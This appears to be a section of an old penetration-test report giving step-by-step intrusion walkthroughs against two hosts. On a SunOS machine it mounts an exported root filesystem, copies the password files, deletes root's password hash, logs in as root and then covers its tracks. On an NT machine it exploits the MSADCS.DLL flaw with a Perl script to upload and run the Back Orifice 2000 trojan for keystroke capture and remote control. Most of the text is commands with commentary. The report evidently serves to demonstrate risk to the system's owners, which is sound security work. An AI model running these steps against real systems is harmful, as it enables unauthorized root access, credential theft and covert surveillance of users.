Sample Intrusion Methodologies
|
|
First we examine host FOO, a UNIX machine running SUNOS 5.4. Text in bold represents hacker input, text in italic represents target responses. Text in { } is explanatory commentary.
From the local Linux prompt:
# showmount -e foo
Export list for foo:
filesystem restrictions
/ everyone /usr everyone /usr/local everyone
/var everyone /disk3 everyone
{The root filesystem is being exported to Everyone, on the Internet this really does mean EVERYONE}
# mkdir /foo
{create a local mount point} # mount foo:/ /foo {mount the root filesystem on foo to a local directory} # cd /foo/etc {we now have direct access to foo's system files} #
cp shadow / # cp passwd / {copy foo's password files to our local machine for cracking, this is not required as we already have complete access to foo, but some of the password's may exist on other machines on the remote network}
# cp shadow shad.backup {make a backup of the remote password file} # vi shadow {open the shadowed password file with a standard editor and remove the password hash for root}
# telnet foo
Foo - SUNOS 5.4
login: root {login to foo as root}
Welcome to foo. {no password required, the hacker is now free to install
whatever backdoors/trojans/rootkits he desires and has full administrative access to this machine}
# logout {logout of foo} #
rm /foo/etc/shadow {delete compromised password file} # cp /foo/etc/shad.backup /foo/etc/shadow {restore genuine password file} # umount /foo
{unmount remote filesystem, game over.........}
Next we examine the NT host, BAR. There is a serious vulnerability on this host referenced in the report as MSADCS.DLL. This will allow a
hacker to execute remote commands and upload files to this system. Our plan will be to upload and execute a remote access trojan (Back Orifice 2000), to give us complete and unrestricted access to
the target filesystem as well capture keystrokes, monitor user input and hijack the keyboard and mouse. The trojan will be called monitor.exe and will be Windows executable code, though the exploit
will be carried out from a Linux machine. This exploit will use the easily acquirable hacker programs: msadc-trojan_pl & msadc2_pl, both of which are written in perl. The source is included in
the appendices.
From the Linux prompt:
# echo "+ +" > .rhosts {slight modification to local system config} #
./msadc-trojan.pl bar 12.34.12.34 monitor.exe {upload and execute trojan using remote and local IPs}
Now all is required is to connect to remote trojan using the BO2K client. A
trivial exploit, but it allows complete access, once again game over.........
|
|